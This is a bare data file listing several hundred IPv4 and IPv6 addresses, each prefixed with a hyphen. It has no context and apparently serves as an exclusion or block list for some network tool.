-172.255.173.154 -185.13.59.158 -185.49.148.38 -142.4.103.85 -62.210.222.241 -119.28.50.205 -101.201.237.138 -156.67.218.100 -172.252.10.254 -173.199.116.25 -203.104.177.39 -172.104.57.240 -23.19.202.49 -185.155.99.110 -86.127.82.114 -185.14.29.31 -134.119.74.149 -183.61.81.206 -51.15.223.115 -60.166.13.13 -5.196.80.187 -176.31.129.167 -174.139.37.126 -85.119.92.27 -122.9.163.210 -205.209.135.70 -123.207.77.117 -159.148.192.235 -218.32.216.174 -96.8.125.50 -200.98.148.151 -118.193.235.78 -142.91.243.98 -31.169.92.102 -95.173.181.106 -62.141.35.243 -112.78.4.153 -116.255.182.54 -52.221.242.147 -64.140.160.211 -42.51.38.221 -103.244.3.125 -139.162.151.22 -62.63.157.151 -41.185.91.19 -84.2.38.76 -167.114.48.61 -23.225.0.238 -87.252.5.58 -23.225.89.213 -212.83.166.112 -120.25.198.49 -198.58.122.126 -123.255.201.254 -104.203.82.240 -173.208.222.122 -174.37.231.156 -178.33.255.5 -216.147.163.89 -188.166.97.166 -151.80.172.21 -217.182.38.123 -96.126.107.77 -198.199.124.94 -107.178.150.71 -92.222.193.136 -120.77.6.98 -213.189.61.187 -23.225.89.225 -67.229.58.223 -186.194.224.58 -142.91.241.110 -119.27.166.185 -153.122.56.233 -103.12.49.4 -172.255.173.86 -107.164.66.51 -211.149.162.20 -91.224.194.189 -61.152.74.146 -193.70.97.206 -77.75.124.166 -182.163.126.189 -173.255.214.250 -104.232.102.145 -23.88.82.240 -137.74.229.180 -37.187.150.122 -112.121.109.45 -23.225.113.231 -107.187.192.157 -149.202.16.156 -124.232.142.79 -211.95.26.186 -49.50.81.140 -219.90.122.17 -185.13.57.38 -178.33.5.28 -144.217.115.116 -45.64.130.109 -87.118.68.205 -158.69.142.158 -47.52.70.233 -164.132.239.252 -51.255.164.139 -103.1.220.107 -54.150.230.236 -185.163.100.135 -118.193.223.253 -202.143.97.142 -184.154.250.76 -35.198.189.12 -112.124.110.77 -5.145.170.124 -77.81.245.50 -91.224.194.108 -185.37.227.134 -122.9.15.19 -120.77.71.175 -107.187.214.27 -47.93.2.16 -120.77.219.105 -162.243.251.241 -103.3.173.164 -183.238.25.86 -23.225.113.142 -107.181.251.136 -188.165.242.197 -174.143.254.145 -121.9.242.232 -107.186.35.218 -103.240.214.69 -167.114.103.156 -192.155.94.145 -23.95.80.52 -120.27.4.61 -134.119.80.110 -121.42.158.141 -218.93.208.228 -103.30.87.67 -5.35.252.122 -116.62.16.239 -120.55.194.38 -210.35.128.137 -107.187.221.244 -60.199.195.240 -192.95.36.121 -157.7.242.23 -149.56.46.219 -86.104.177.91 -174.139.69.136 -52.192.176.228 -172.246.220.28 -37.220.137.81 -69.27.43.180 -5.2.139.35 -202.153.178.196 -107.165.201.210 -189.84.153.61 -138.68.191.2 -185.12.111.65 -133.242.130.197 -103.205.1.77 -128.199.250.6 -37.59.246.212 -67.212.173.189 -47.88.107.171 -47.93.11.93 -54.36.36.160 -114.215.96.51 -23.244.241.159 -164.132.7.167 -178.33.30.161 -182.245.36.245 -23.95.13.37 -107.187.221.227 -23.19.237.36 -52.50.113.246 -23.230.19.200 -103.240.214.216 -209.64.158.231 -103.240.215.4 -172.110.18.87 -166.62.91.246 -109.169.86.210 -109.203.103.82 -23.225.0.81 -47.52.57.169 -94.76.227.180 -87.98.205.10 -218.93.193.155 -121.42.224.252 -103.240.214.30 -23.230.19.186 -103.240.212.20 -162.250.126.124 -103.100.157.231 -103.205.2.87 -45.249.95.130 -52.221.214.210 -172.255.173.155 -109.254.248.74 -156.235.168.36 -5.153.18.170 -150.129.172.104 -114.215.185.229 -107.151.78.206 -103.47.192.62 -37.128.127.202 -88.141.0.110 -122.114.42.223 -77.93.37.69 -23.104.135.79 -91.134.16.252 -39.107.58.135 -103.240.214.100 -192.150.83.88 -182.254.153.74 -186.235.185.254 -66.171.238.158 -82.135.151.119 -172.107.75.238 -67.225.131.221 -113.164.20.5 -54.254.144.225 -118.190.113.150 -103.244.0.48 -107.178.162.84 -85.25.145.28 -120.26.73.188 -51.254.211.118 -173.233.92.134 -123.59.37.123 -163.172.210.217 -37.97.248.214 -37.187.135.235 -185.163.100.31 -210.124.164.48 -193.253.208.230 -67.212.160.125 -172.255.173.178 -103.240.214.211 -182.16.121.53 -134.0.117.51 -145.239.235.228 -159.148.37.99 -23.225.113.220 -211.152.44.93 -104.148.75.214 -85.31.102.108 -185.13.58.55 -52.43.22.103 -68.232.185.88 -207.148.16.61 -61.64.57.172 -112.29.244.53 -107.190.233.66 -47.94.205.9 -77.75.124.188 -103.240.215.154 -163.47.11.43 -50.97.159.32 -72.167.119.150 -211.149.228.164 -82.196.13.42 -166.78.5.251 -87.229.102.85 -104.203.82.109 -190.148.69.229 -222.186.170.65 -39.104.56.160 -103.240.213.53 -185.51.247.224 -5.10.90.202 -103.240.214.218 -156.235.169.172 -82.146.44.114 -119.23.8.181 -150.95.138.232 -107.186.35.209 -5.45.72.185 -109.68.82.171 -58.49.12.186 -190.14.159.6 -103.84.194.102 -52.193.95.121 -62.113.238.68 -195.209.236.57 -119.17.192.108 -156.67.216.205 -107.187.41.8 -47.90.77.56 -45.76.144.48 -54.174.125.23 -104.149.66.167 -120.27.189.41 -178.250.186.34 -101.53.137.83 -185.38.250.102 -107.187.41.210 -173.249.24.134 -156.235.169.22 -104.251.222.101 -94.23.111.192 -218.92.229.242 -137.74.154.73 -87.98.217.151 -13.231.27.179 -5.39.35.113 -172.106.187.238 -120.26.100.228 -188.165.187.188 -185.92.72.97 -95.85.28.216 -47.96.161.201 -23.244.241.109 -23.110.47.217 -218.32.216.237 -69.65.56.177 -50.97.234.145 -64.6.108.164 -23.104.135.162 -162.144.116.127 -172.255.173.17 -156.237.176.218 -217.182.52.87 -42.235.253.193 -138.197.68.48 -61.142.176.27 -120.26.107.125 -122.114.42.2 -178.32.5.41 -142.91.232.116 -146.185.183.239 -222.122.226.137 -103.250.94.253 -211.149.228.189 -64.118.95.126 -117.114.225.55 -107.178.149.89 -133.130.90.250 -23.238.129.116 -46.105.172.251 -103.213.250.19 -123.56.230.244 -121.14.154.20 -142.4.107.226 -172.107.75.245 -116.236.231.168 -202.85.221.73 -154.16.241.51 -5.134.122.167 -162.247.78.77 -208.43.239.70 -192.184.92.109 -216.106.96.84 -164.132.83.3 -77.92.144.23 -114.55.231.90 -96.8.125.102 -37.59.225.242 -205.134.235.253 -161.202.188.77 -172.246.220.59 -210.36.247.160 -112.74.24.71 -108.174.202.10 -161.53.173.35 -123.57.206.247 -103.18.109.151 -50.23.88.116 -23.224.115.86 -86.104.177.6 -120.27.119.86 -2a0a:7d80:1:7::104:ec -104.149.66.155 -173.212.214.108 -23.238.166.174 -103.48.80.55 -107.21.8.163 -46.101.225.39 -103.1.209.111 -182.92.76.8 -103.240.214.113 -82.223.69.239 -183.93.198.18 -74.208.74.198 -185.98.63.133 -198.199.86.213 -179.96.211.202 -142.91.241.70 -103.200.16.140 -120.76.161.107 -101.200.59.159 -108.61.193.166 -172.107.165.33 -171.244.8.22 -123.57.244.13 -67.229.73.109 -65.18.113.59 -120.24.78.234 -222.186.21.98 -108.161.132.114 -121.196.220.131 -178.74.253.74 -14.192.149.154 -208.83.62.19 -101.132.114.47 -103.240.214.188 -103.235.224.185 -142.91.243.125 -204.244.237.40 -198.56.192.91 -212.68.42.162 -153.120.12.244 -180.167.79.86 -120.76.73.171 -216.155.154.165 -202.91.15.123 -180.178.34.178 -91.143.47.23 -149.56.151.148 -86.105.32.28 -14.157.107.4 -162.144.90.182 -87.98.251.100 -5.178.109.203 -109.201.149.222 -82.135.151.230 -45.55.55.182 -142.91.243.82 -94.18.235.146 -124.254.0.42 -119.38.133.213 -5.178.109.45 -47.100.7.98 -188.165.253.38 -114.55.7.128 -119.47.91.90 -104.202.185.86 -114.215.139.30 -123.56.189.198 -142.4.103.78 -60.205.223.162 -116.236.231.205 -155.94.69.208 -23.225.147.2 -115.29.251.117 -23.19.237.38 -183.61.80.32 -66.55.143.38 -5.178.109.216 -23.230.19.46 -103.240.214.36 -49.212.150.70 -35.169.115.158 -172.255.173.158 -103.240.214.130 -111.1.35.16 -91.146.103.246 -221.4.150.26 -62.213.100.252 -75.126.140.232 -96.47.235.186 -89.145.103.76 -101.201.196.83 -45.35.99.174 -124.243.223.42 -91.134.231.88 -80.69.174.138 -64.91.229.55 -114.113.148.225 -54.251.59.139 -120.55.195.209 -61.152.104.146 -221.4.199.106 -23.238.129.108 -182.92.159.75 -167.114.130.18 -202.171.225.127 -64.62.181.53 -92.222.37.3 -155.232.40.166 -172.246.220.239 -185.13.59.247 -156.235.172.68 -185.13.58.237 -103.240.246.110 -103.1.220.116 -23.89.143.10 -221.214.73.10 -203.76.107.19 -35.176.145.80 -103.240.213.231 -67.225.238.42 -121.42.238.120 -104.219.169.99 -120.27.188.167 -107.191.99.169 -74.50.48.160 -202.171.225.108 -104.232.102.170 -156.237.179.100 -137.74.228.21 -209.59.155.179 -31.220.57.167 -59.110.213.111 -107.186.35.149 -85.95.228.25 -94.103.38.18 -196.45.123.15 -144.217.188.146 -122.9.235.234 -103.240.214.220 -114.255.34.232 -207.246.106.52 -217.30.184.103 -167.114.40.105 -82.163.78.21 -138.201.78.7 -192.99.78.135 -45.32.109.4 -192.99.236.69 -107.186.35.4 -107.164.66.52 -5.196.129.221 -182.16.121.51 -13.126.222.245 -178.132.78.142 -216.14.118.120 -23.230.19.13 -77.220.183.35 -23.225.89.76 -79.133.162.165 -46.140.143.149 -178.211.51.7 -46.41.149.63 -142.91.239.108 -172.246.128.155 -59.110.166.165 -174.142.242.78 -185.243.130.54 -178.32.28.167 -103.240.214.201 -120.77.251.21 -107.186.35.196 -119.28.5.235 -103.30.7.252 -176.74.154.36 -172.107.73.226 -125.140.163.79 -106.75.45.177 -188.226.187.28 -123.206.109.226 -23.225.0.198 -123.58.32.114 -74.127.45.151 -185.95.218.236 -104.148.75.206 -103.107.68.82 -169.55.247.212 -80.87.199.194 -109.190.102.140 -218.93.63.101 -172.107.71.31 -121.41.45.176 -51.255.159.107 -47.92.85.59 -120.77.240.196 -81.196.53.58 -103.240.212.109 -37.187.88.28 -31.22.112.70 -80.241.213.248 -104.202.185.94 -121.58.206.158 -210.245.17.37 -103.66.44.98 -192.237.222.104 -211.141.145.226 -195.54.44.26 -173.245.89.147 -139.224.60.168 -101.71.9.44 -45.32.11.119 -45.79.185.172 -74.207.224.140 -101.200.203.180 -37.104.175.250 -184.168.124.48 -198.50.162.195 -125.212.201.27 -115.159.204.123 -172.107.73.227 -172.102.197.186 -124.172.136.45 -184.172.108.206 -184.164.139.24 -59.1.135.213 -13.250.26.17 -86.104.177.26 -103.100.157.192 -47.97.186.65 -203.124.11.241 -1.195.122.224 -67.229.73.84 -23.230.19.122 -31.24.154.93 -120.27.250.192 -172.106.186.38 -47.93.202.4 -195.2.77.166 -185.154.130.32 -172.255.173.89 -45.114.94.194 -107.151.139.96 -172.107.147.29 -185.4.227.117 -216.158.235.10 -67.227.191.155 -190.57.169.136 -107.179.98.101 -64.6.97.200 -77.75.124.178 -113.77.241.194 -172.107.147.8 -103.205.2.107 -45.125.50.102 -107.6.146.101 -167.114.11.125 -46.21.108.26 -18.231.165.30 -5.199.165.235 -172.246.196.54 -23.104.135.237 -13.250.25.133 -107.178.147.83 -194.19.246.76 -188.166.219.223 -111.230.236.198 -157.52.240.90 -206.212.245.179 -23.104.135.173 -103.1.40.169 -218.32.216.247 -23.225.89.173 -31.192.231.236 -108.166.170.101 -2a01:4f8:171:6c8::126 -183.87.38.6 -107.186.35.76 -47.91.74.174 -122.13.79.226 -198.211.115.84 -142.91.95.104 -122.9.29.219 -142.4.119.91 -202.181.132.164 -164.70.16.231 -103.240.212.16 -122.114.90.177 -172.246.220.2 -142.4.107.211 -108.166.208.98 -173.192.196.111 -87.118.115.200 -5.135.58.111 -200.231.112.243 -217.182.219.175 -213.186.127.170 -210.211.121.101 -193.70.12.37 -172.107.75.220 -47.104.61.19 -115.29.251.65 -193.150.96.19 -192.95.16.149 -104.202.185.233 -112.90.56.5 -185.163.100.123 -185.163.100.123 -169.46.56.105 -223.26.68.219 -47.94.36.16 -60.199.170.211 -173.212.253.64 -112.53.188.39 -45.61.114.59 -47.104.58.104 -188.165.217.15 -120.78.223.8 -138.201.178.233 -188.93.15.50 -182.254.230.125 -71.19.148.168 -74.222.172.7 -185.169.197.22 -103.53.199.179 -101.200.218.172 -45.41.92.148 -83.149.123.52 -81.200.248.146 -60.190.19.125 -185.85.73.251 -195.3.243.165 -147.135.220.138 -159.253.33.200 -118.89.37.62 -104.155.53.217 -217.65.8.60 -172.107.71.3 -178.211.32.102 -139.59.102.17 -194.14.179.148 -103.205.0.95 -112.124.40.115 -119.29.188.136 -93.93.52.246 -153.122.12.104 -121.52.210.195 -43.245.34.3 -137.74.35.41 -37.187.244.23 -112.124.108.188 -199.15.206.132 -104.224.200.248 -91.215.157.181 -188.138.235.52 -123.9.206.3 -45.35.163.101 -2a01:7e01::f03c:91ff:feb4:724e -47.92.156.171 -188.226.171.180 -23.238.129.92 -54.36.120.177 -222.187.232.217 -51.254.228.112 -202.146.208.188 -2a0a:7d80:1:7::102:17d -23.230.19.233 -66.55.156.137 -62.109.12.29 -2a0a:7d80:1:7::95:e -88.214.242.107 -157.7.142.147 -111.202.15.16 -104.202.185.197 -194.231.246.130 -103.53.199.59 -122.9.15.51 -43.252.89.113 -77.92.144.24 -211.149.221.229 -123.57.152.125 -60.173.26.133 -60.12.111.85 -198.24.128.3 -109.201.149.178 -80.240.128.82 -158.69.131.220 -54.173.85.13 -192.95.5.126 -103.240.213.236 -192.186.143.250 -159.148.13.131 -23.95.128.197 -128.199.66.174 -134.119.224.181 -173.193.149.103 -140.143.96.180 -191.241.225.132 -103.15.135.95 -156.237.179.111 -103.198.45.25 -178.62.172.186 -198.27.66.88 -88.99.104.237 -188.120.241.128 -89.207.131.35 -188.166.62.184 -108.170.59.201 -103.240.212.182 -118.89.59.173 -79.133.220.77 -185.124.84.220 -121.196.236.204 -77.77.149.26 -103.200.7.148 -192.241.189.154 -23.225.0.152 -104.202.185.137 -123.127.114.32 -139.196.254.9 -222.45.51.236 -172.107.147.18 -134.119.15.29 -95.173.178.179 -103.240.214.52 -118.194.49.31 -45.32.35.216 -119.136.124.25 -216.189.157.177 -31.169.92.100 -118.190.8.181 -216.17.101.158 -103.240.214.114 -61.166.155.45 -198.211.126.22 -173.212.244.91 -178.18.91.15 -178.32.47.70 -51.254.167.178 -119.29.61.176 -128.199.87.0 -128.1.182.147 -50.18.253.238 -23.225.89.58 -81.180.117.182 -173.212.242.141 -45.114.94.44 -139.196.120.101 -120.76.247.32 -36.66.4.18 -183.61.81.205 -120.24.69.23 -95.183.3.83 -103.240.213.88 -119.61.7.5 -80.241.221.110 -107.180.79.238 -195.154.32.64 -157.7.140.64 -158.69.3.192 -23.244.241.108 -58.215.171.195 -142.4.107.243 -23.104.135.93 -118.193.202.253 -121.40.32.170 -211.149.163.123 -157.7.170.129 -103.100.157.121 -107.187.192.139 -114.247.163.207 -146.185.173.223 -23.244.241.16 -2a0a:7d80:1:7::101:24c -50.97.120.169 -23.225.0.174 -119.2.48.251 -112.250.106.57 -149.56.225.173 -120.92.237.128 -2a0a:7d80:1:7::97:206 -61.174.112.126 -193.70.71.48 -156.235.170.108 -49.212.196.42 -142.91.95.220 -80.233.244.81 -23.111.170.250 -117.81.138.86 -89.232.78.29 -96.126.118.189 -115.28.87.27 -123.162.80.146 -47.90.121.30 -107.181.251.137 -23.238.145.95 -23.244.241.201 -183.221.165.16 -219.146.152.154 -47.93.184.241 -107.161.17.83 -103.1.40.190 -85.254.126.32 -2607:f3f0:1:0:3e4a:92ff:fef4:1270 -203.151.157.1 -52.198.215.122 -164.132.70.98 -23.225.0.209 -54.37.136.132 -23.19.22.6 -47.97.11.2 -45.114.94.9 -91.142.212.23 -104.202.185.10 -185.93.245.62 -209.87.151.190 -108.178.29.134 -185.163.100.185 -104.202.185.177 -23.225.0.45 -192.210.170.220 -157.52.130.132 -67.23.248.139 -103.12.50.62 -184.107.231.138 -109.68.82.196 -178.33.162.140 -211.157.179.132 -133.242.195.152 -121.52.212.144 -222.89.74.253 -60.205.163.100 -78.28.131.82 -45.41.92.154 -119.81.31.218 -142.91.95.130 -62.210.114.52 -188.165.23.101 -47.94.7.71 -66.85.95.12 -156.235.170.123 -112.121.153.12 -154.16.114.190 -120.77.144.222 -176.31.188.159 -180.169.17.14 -115.42.121.199 -14.63.215.12 -93.123.36.244 -103.74.121.202 -192.241.119.76 -138.201.189.91 -27.254.136.36 -103.239.30.54 -37.187.28.95 -185.38.45.112 -185.12.111.186 -50.30.42.184 -54.175.92.70 -43.254.240.25 -218.86.59.252 -120.27.46.58 -69.164.202.128 -119.29.26.198 -100.43.157.123 -195.154.167.165 -210.253.210.206 -45.79.92.118 -5.101.176.83 -45.112.204.139 -128.199.198.233 -125.88.152.239 -178.211.32.100 -120.25.126.51 -91.227.16.116 -136.0.69.148 -185.180.206.150 -216.106.96.69 -172.246.196.135 -85.95.239.55 -74.208.197.13 -103.16.133.248 -185.114.192.40 -59.153.61.181 -202.84.35.52 -139.162.169.237 -185.45.72.244 -199.96.214.93 -5.178.109.108 -136.0.69.248 -122.9.229.145 -118.31.12.151 -54.172.39.118 -31.186.101.126 -39.108.76.223 -195.178.5.164 -121.43.199.16 -37.123.98.232 -120.27.211.11 -210.14.134.164 -68.232.185.90 -62.63.190.34 -213.32.122.229 -178.132.2.69 -150.95.145.177 -212.224.101.252 -45.77.35.63 -74.221.216.181 -112.50.251.24 -147.255.39.84 -182.73.36.115 -23.104.135.181 -23.244.241.218 -23.225.89.98 -23.238.166.168 -107.161.169.14 -75.126.0.166 -162.241.240.239 -195.154.29.122 -69.16.215.214 -45.79.144.17 -202.93.217.202 -114.215.110.217 -87.230.54.59 -209.126.222.33 -72.55.139.44 -139.196.205.14 -172.246.196.208 -2600:3c00::f03c:91ff:fe33:a514 -218.232.75.193 -23.244.241.143 -159.203.143.137 -163.44.165.185 -2a0a:7d80:1:7::95:17a -103.247.15.189 -180.142.128.75 -178.32.189.165 -103.65.181.98 -142.91.95.133 -47.100.9.219 -119.97.185.101 -120.24.13.66 -13.115.221.11 -23.244.241.226 -120.25.62.208 -188.132.148.123 -23.234.7.155 -78.140.220.12 -107.178.147.67 -66.154.119.217 -45.32.9.223 -116.255.182.47 -172.247.51.242 -123.207.110.244 -195.208.187.26 -138.122.108.10 -203.73.70.65 -64.118.92.4 -133.242.189.172 -45.32.103.13 -218.2.101.178 -82.102.14.5 -142.91.239.113 -120.26.87.132 -39.108.89.230 -106.15.62.36 -142.91.95.54 -118.69.228.250 -172.246.220.10 -119.10.116.143 -194.146.226.209 -194.19.246.110 -103.1.49.172 -172.247.51.79 -114.215.103.45 -94.250.251.221 -213.155.227.114 -223.95.163.3 -104.156.247.178 -74.86.147.248 -91.191.172.112 -5.39.63.26 -150.95.137.147 -131.161.72.239 -142.4.113.217 -74.208.98.165 -108.61.181.26 -81.94.123.171 -79.137.28.22 -109.95.210.240 -91.142.212.105 -69.27.43.68 -114.242.180.103 -47.93.156.178 -185.10.99.42 -219.235.5.6 -172.246.196.122 -81.18.172.47 -172.246.196.152 -54.222.239.206 -182.92.100.235 -178.33.9.64 -2001:1af8:4400:a056:2:0:124:1001 -122.246.143.3 -188.26.117.97 -37.220.20.250 -89.163.240.230 -62.122.254.26 -2a0a:7d80:1:7::94:109 -159.148.37.115 -149.56.44.133 -188.226.161.93 -138.197.201.154 -103.240.212.145 -172.246.220.153 -45.35.163.228 -172.247.51.195 -142.91.95.99 -121.42.152.31 -117.135.164.170 -174.139.199.116 -184.172.41.105 -172.255.173.248 -144.168.70.137 -67.229.58.234 -203.191.149.8 -219.145.218.228 -112.124.19.174 -115.126.65.138 -107.178.147.71 -61.91.11.157 -107.178.149.124 -37.58.76.165 -120.77.67.237 -185.12.111.130 -172.107.146.172 -172.107.146.140 -42.112.29.145 -18.222.10.250 -120.25.215.70 -2400:8901::f03c:91ff:fe08:c208 -45.63.115.197 -212.83.143.175 -45.32.101.217 -66.187.177.66 -123.207.243.41 -86.123.65.229 -5.35.248.81 -23.110.61.94 -103.240.214.12 -23.224.115.165 -172.252.10.236 -195.245.113.31 -23.88.82.70 -74.208.90.65 -115.29.184.195 -31.131.22.48 -122.114.84.73 -172.246.220.201 -211.149.211.232 -23.239.132.253 -176.31.192.85 -201.144.30.139 -47.89.27.1 -157.52.130.139 -160.153.36.194 -192.81.218.176 -103.253.112.208 -120.78.212.115 -92.222.26.2 -216.106.96.89 -156.235.172.93 -103.240.212.119 -103.74.121.167 -60.12.119.12 -103.43.69.180 -36.66.43.121 -180.235.137.35 -117.48.192.243 -23.244.241.122 -156.237.179.103 -63.142.255.48 -158.69.36.11 -103.230.120.236 -45.35.99.153 -177.128.240.158 -210.211.97.129 -212.129.37.10 -185.164.138.207 -87.230.54.209 -195.210.48.187 -34.242.33.225 -173.0.63.114 -178.32.189.166 -66.171.239.183 -107.6.182.99 -190.121.230.238 -103.240.214.145 -103.246.17.110 -85.185.91.200 -192.241.152.23 -91.234.99.21 -103.43.69.173 -172.252.10.165 -2600:3c00::f03c:91ff:fef1:709d -192.99.104.160 -83.166.226.74 -47.90.39.7 -123.60.202.240 -194.146.225.186 -172.104.32.84 -87.230.54.144 -103.240.214.202 -162.243.238.252 -106.14.210.223 -146.185.149.112 -178.32.137.142 -217.182.38.126 -52.38.90.235 -222.69.93.87 -45.76.22.201 -178.33.67.54 -104.236.20.89 -183.60.177.195 -89.33.125.170 -2a02:348:b9:458::1 -183.157.161.173 -104.202.185.87 -159.253.33.194 -103.240.214.189 -51.255.4.8 -109.123.113.100 -95.85.40.200 -47.92.157.108 -103.80.67.158 -61.58.60.243 -187.182.30.124 -202.162.194.60 -123.207.30.113 -115.248.132.215 -37.187.152.162 -104.202.185.182 -87.230.54.157 -172.255.173.231 -217.182.228.101 -198.27.123.225 -103.240.214.9 -185.122.140.91 -103.205.3.107 -182.255.0.77 -185.33.234.84 -120.31.129.84 -62.141.72.148 -202.65.112.38 -45.77.111.183 -119.254.109.133 -45.56.94.190 -178.32.102.52 -172.247.51.248 -2a02:c200:1:10:2:6:4103:1 -54.255.216.3 -192.169.190.65 -136.243.238.80 -103.12.50.52 -23.225.113.226 -187.141.133.247 -2605:6280:1:d::67 -23.19.238.2 -103.240.214.193 -217.153.59.11 -178.77.101.169 -2a01:4f8:191:41c6::2 -2a0a:7d80:1:7::92:160 -162.220.57.5 -144.217.131.66 -194.145.209.216 -173.254.242.22 -178.32.163.48 -119.84.126.67 -142.4.23.231 -45.76.186.46 -217.182.244.54 -172.252.10.188 -103.240.214.32 -182.61.13.82 -161.0.42.50 -82.135.148.209 -94.23.87.96 -59.56.98.100 -115.29.242.138 -23.244.10.162 -104.148.100.101 -77.95.130.8 -172.107.165.44 -45.33.124.92 -139.59.177.121 -51.254.153.103 -150.95.178.72 -115.29.161.63 -205.209.155.47 -23.237.64.123 -77.77.149.20 -156.235.170.16 -192.34.26.34 -52.243.35.229 -91.134.151.92 -45.76.145.3 -123.207.254.214 -112.74.63.26 -80.86.85.9 -104.168.149.161 -172.107.75.247 -208.73.20.188 -45.35.125.53 -183.129.141.11 -104.145.231.76 -46.105.172.242 -139.162.150.49 -185.187.161.157 -162.250.124.76 -38.88.86.247 -172.106.184.28 -59.120.224.71 -121.199.48.241 -45.114.94.8 -72.167.109.164 -74.117.105.20 -176.31.16.53 -149.255.152.35 -87.230.54.103 -64.118.90.215 -119.29.109.80 -46.182.29.7 -133.242.137.213 -159.148.37.118 -51.255.192.46 -163.177.182.147 -182.61.58.100 -119.23.125.142 -172.98.74.134 -172.246.196.161 -54.247.151.197 -170.78.77.61 -2c0f:f738:2004:61:: -116.30.5.203 -103.53.197.240 -142.91.243.94 -139.162.30.249 -137.74.253.118 -184.95.41.178 -2a0a:7d80:1:7::105:303 -82.135.151.250 -82.135.148.132 -149.56.22.167 -120.79.46.1 -120.24.186.155 -204.93.61.181 -194.88.218.170 -106.14.97.201 -180.96.27.95 -91.142.210.63 -185.163.126.69 -103.40.160.42 -158.69.1.224 -178.33.43.206 -176.28.2.4 -142.91.243.76 -67.227.212.196 -45.58.55.235 -205.186.154.194 -172.107.146.153 -159.203.157.12 -185.45.72.233 -121.41.43.128 -103.240.212.253 -162.251.21.75 -114.215.105.174 -150.95.148.143 -200.74.240.23 -192.241.119.75 -192.99.86.112 -104.202.185.113 -116.89.250.189 -216.184.127.156 -199.15.206.98 -213.202.254.159 -158.69.156.181 -185.13.57.95 -133.242.150.27 -178.208.88.66 -106.14.6.154 -156.235.169.189 -145.239.102.51 -212.57.38.225 -23.88.82.120 -151.236.221.177 -199.83.49.229 -112.206.54.27 -211.167.76.202 -5.135.224.47 -188.165.19.215 -211.149.147.19 -116.126.142.117 -151.80.119.242 -5.178.109.88 -84.2.38.75 -23.224.115.176 -103.74.121.164 -66.55.144.204 -77.92.144.21 -202.169.58.104 -47.90.0.199 -39.108.8.49 -65.60.5.105 -70.38.30.154 -188.166.80.157 -120.78.128.85 -210.211.124.13 -108.170.62.167 -5.135.192.167 -98.158.179.114 -23.111.164.83 -23.227.187.13 -45.61.114.4 -122.225.97.12 -190.202.8.139 -116.62.100.57 -130.185.78.137 -209.73.140.4 -104.148.75.208 -178.21.18.55 -104.148.100.115 -194.19.246.52 -54.173.181.78 -104.202.185.52 -1.226.200.55 -66.254.163.3 -37.123.98.251 -103.240.214.6 -23.224.115.43 -87.98.158.186 -54.80.43.164 -83.143.85.11 -139.162.217.61 -178.32.217.192 -103.12.51.48 -23.104.135.150 -43.231.132.205 -23.253.200.51 -2a0a:7d80:1:7::95:1db -47.93.40.54 -23.225.0.143 -120.25.62.74 -156.235.168.43 -100.43.157.126 -23.22.53.15 -123.56.41.80 -104.149.66.161 -159.65.4.216 -91.134.227.129 -92.222.99.33 -101.200.104.188 -188.166.156.175 -202.146.208.172 -188.226.150.205 -5.196.139.217 -192.169.195.38 -104.202.185.164 -172.107.75.214 -192.81.130.103 -149.56.182.49 -185.38.45.113 -120.25.225.55 -67.228.171.208 -121.42.15.197 -94.198.96.132 -121.42.215.106 -88.150.160.36 -64.40.110.134 -119.108.39.243 -112.74.112.196 -139.162.12.83 -62.12.115.89 -162.13.2.204 -51.254.218.91 -216.14.114.166 -172.106.186.57 -118.244.239.5 -45.35.163.156 -103.1.220.11 -54.254.160.178 -54.252.205.28 -85.17.15.174 -120.26.204.145 -108.170.62.169 -138.201.252.220 -92.51.133.197 -139.162.74.40 -139.196.19.4 -116.62.202.222 -123.57.221.43 -5.189.149.169 -176.53.14.84 -103.28.38.195 -103.100.157.63 -45.32.203.103 -162.144.98.225 -103.240.214.66 -43.252.230.200 -113.209.38.71 -2a0a:7d80:1:7::96:83 -103.3.40.82 -23.230.19.61 -198.199.124.192 -45.76.126.111 -119.23.21.249 -198.255.108.54 -23.238.176.240 -211.91.180.92 -103.100.157.28 -94.199.53.81 -103.240.214.48 -2a01:7e00::f03c:91ff:fe84:2505 -103.205.0.100 -78.129.251.136 -188.164.198.118 -85.254.126.52 -149.202.31.178 -88.80.189.15 -104.131.151.200 -39.108.96.16 -213.136.90.123 -120.76.245.254 -23.224.115.4 -84.19.175.154 -172.106.186.20 -144.168.70.141 -104.192.31.37 -27.154.240.82 -45.41.92.163 -185.46.150.158 -208.77.22.27 -45.35.163.112 -45.35.102.153 -52.28.37.206 -58.213.105.5 -172.246.196.150 -178.79.128.177 -107.151.76.142 -46.38.55.136 -103.240.212.123 -201.16.163.226 -211.149.243.244 -101.37.25.133 -192.99.81.230 -86.105.32.14 -118.69.169.122 -46.105.217.241 -2a0a:7d80:1:7::102:2f9 -72.52.169.100 -70.32.78.92 -139.199.78.98 -2a0a:7d80:1:7::91:26b -91.90.234.10 -149.202.76.69 -185.164.138.219 -173.230.133.242 -188.116.7.4 -84.204.252.5 -159.203.133.201 -2400:8900::f03c:91ff:feae:b8a1 -188.132.215.228 -103.245.200.55 -172.107.73.195 -103.74.118.175 -67.229.63.101 -79.125.110.71 -52.220.143.232 -164.132.7.164 -123.56.120.175 -142.44.143.214 -172.246.196.190 -66.147.236.172 -46.20.5.178 -109.169.86.209 -172.247.51.215 -103.74.121.176 -65.60.43.168 -156.235.172.91 -139.224.223.238 -185.164.138.204 -112.121.184.213 -145.239.102.112 -94.23.198.122 -82.146.39.241 -104.203.82.57 -45.33.123.36 -109.232.224.19 -2a01:4f8:162:3cc::2 -2a01:7c8:aab5:1ed:5054:ff:fe4e:334 -124.205.20.94 -178.32.157.91 -118.190.66.126 -104.251.218.119 -134.119.174.144 -122.9.15.53 -122.9.22.179 -109.74.193.140 -113.196.233.164 -122.9.163.238 -198.23.241.199 -217.16.191.145 -58.64.174.26 -77.92.144.6 -66.55.80.179 -188.166.211.97 -122.9.163.211 -94.23.209.197 -103.216.114.35 -137.74.154.74 -95.130.171.22 -221.10.75.46 -192.200.117.196 -52.213.13.11 -93.191.133.87 -51.255.61.4 -59.110.68.45 -79.137.28.24 -43.243.222.235 -122.9.163.253 -2a00:1a48:7807:102:be76:4eff:fe08:e110 -23.244.241.205 -111.231.67.202 -13.112.27.18 -198.23.189.38 -122.9.163.248 -106.187.101.135 -58.87.72.43 -139.224.19.129 -103.240.213.119 -87.230.54.222 -2a0a:7d80:1:9::98:17c -223.100.0.160 -112.74.23.11 -2a0a:7d80:1:7::95:25e -185.13.56.132 -221.195.111.183 -2001:4802:7803:104:be76:4eff:fe20:86f6 -63.142.251.67 -2a0a:7d80:1:7::92:291 -45.42.94.145 -46.101.47.141 